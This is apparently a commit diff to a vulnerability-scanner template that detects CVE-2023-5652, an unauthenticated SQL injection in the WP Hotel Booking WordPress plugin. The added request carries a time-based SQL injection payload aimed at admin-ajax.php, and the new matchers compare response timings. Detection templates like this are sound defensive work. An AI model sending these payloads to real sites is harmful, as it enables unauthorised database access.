fix(CVE-2023-5652): reduce false positives with differential timing detection

http/cves/2023/CVE-2023-5652.yaml

@@ -2,7 +2,7 @@ id: CVE-2023-5652
 
 info:
   name: WP Hotel Booking <= 2.0.7 - SQL Injection
-  author: Shivam Kamboj
+  author: Shivam Kamboj,s4e-io
   severity: critical
   description: |
     WP Hotel Booking WordPress plugin before 2.0.8 contains a SQL injection caused by lack of authorization, CSRF checks, and input escaping in a function hooked to admin_init, letting unauthenticated users perform SQL injections, exploit requires no authentication.
@@ -22,11 +22,19 @@ info:
     cwe-id: CWE-89
   metadata:
     verified: true
-    max-request: 1
+    max-request: 2
   tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,wp-hotel-booking,unauth
 
 http:
   - raw:
+      - |
+        @timeout: 15s
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        action=x&taxonomy=hb_room_type&hb_room_type_ordering[1]=0 END, name=(SELECT SLEEP(0)), term_id=CASE when 1=1 THEN 1
+
       - |
         @timeout: 30s
         POST /wp-admin/admin-ajax.php HTTP/1.1
@@ -38,9 +46,9 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'duration>=8'
-          - 'regex("^0$", body)'
-          - 'status_code == 400'
-          - 'contains(content_type, "text/html")'
+          - 'duration_2 >= 8'
+          - 'duration_2 >= duration_1 + 6'
+          - 'regex("^0$", body_2)'
+          - 'status_code_2 == 400'
+          - 'contains(content_type_2, "text/html")'
         condition: and
-# digest: 4a0a004730450221008879f4e43047983c8c70f5daf1d83ae88616331e8cfcc10fad23cbeb2aa071a5022055a1e3fd28df5c67af461f6cc18040a6f61ce09694cb1ca1173aeed4fdbfd0f4:922c64590222798bb761d5b6d8e72950